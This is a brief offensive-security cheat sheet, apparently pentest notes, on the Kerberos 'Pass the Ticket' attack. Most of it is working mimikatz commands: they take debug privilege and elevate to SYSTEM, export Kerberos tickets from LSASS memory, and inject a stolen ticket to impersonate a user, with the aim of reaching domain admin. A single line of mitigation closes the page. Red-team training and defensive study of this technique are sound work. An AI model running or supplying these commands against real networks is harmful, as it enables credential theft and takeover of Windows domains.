Pass the Ticket
Overview
Use mimikatz to dump TGT from LSASS memory
Will give us .kirbi ticket which can be used to gain domain admin if ticket is from domain admin
Reuse old ticket to impersonate that ticket
Can also use base64-encoded tickets gathered with Rubeus
Look for Administrator tickets
Exploitation
# Start mimikatz and get SYSTEM
mimikatz.exe
privilege::debug
token::elevate
# Export all .kirbi tickets to current directory
sekurlsa::tickets /export
# PTT with mimikatz
kerberos::ptt <ticket>
# List cached tickets
klist
Mitigation:
Don't let domain admins log onto anything except the domain controller
Last updated